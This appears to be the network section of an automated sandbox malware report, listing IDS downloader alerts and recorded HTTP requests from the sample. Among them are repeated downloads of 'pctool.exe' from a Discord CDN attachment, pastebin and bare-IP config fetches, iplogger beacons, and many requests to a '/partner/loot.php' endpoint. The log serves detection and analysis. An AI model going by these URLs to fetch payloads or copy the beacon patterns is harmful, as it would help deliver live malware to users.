                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60087 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60071 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60046 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60050 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60100 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60096 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60104 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60083 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60054 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59983 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59975 -> 162.159.130.233:443
                  Source: global trafficHTTP traffic detected: GET /raw/A7dSG1te HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Host: pastebin.com
                  Source: global trafficHTTP traffic detected: GET /server.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Host: 45.133.1.107
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60viewport-width: 1920Host: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /api/setStats.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Host: wfsdragon.ru
                  Source: global trafficHTTP traffic detected: GET /base/api/statistics.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Host: 51.178.186.149
                  Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gmpeople.com/upload/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: gmpeople.com
                  Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gmpeople.com/upload/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: gmpeople.com
                  Source: unknownHTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.4:59938 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.133.1.107
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.133.1.107
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.133.1.107
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.133.1.107
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.133.1.107
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.178.186.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.178.186.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.178.186.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.129.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.129.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.129.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.129.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.129.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.129.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.129.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.129.119
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.129.119
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1a2jd7 HTTP/1.1User-Agent: m1011Host: iplogger.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1a3jd7 HTTP/1.1Host: iplogger.org
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /raw/A7dSG1te HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Host: pastebin.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /server.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Host: 45.133.1.107
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60viewport-width: 1920Host: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /api/setStats.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Host: wfsdragon.ru
                  Source: global trafficHTTP traffic detected: GET /base/api/statistics.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Host: 51.178.186.149
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
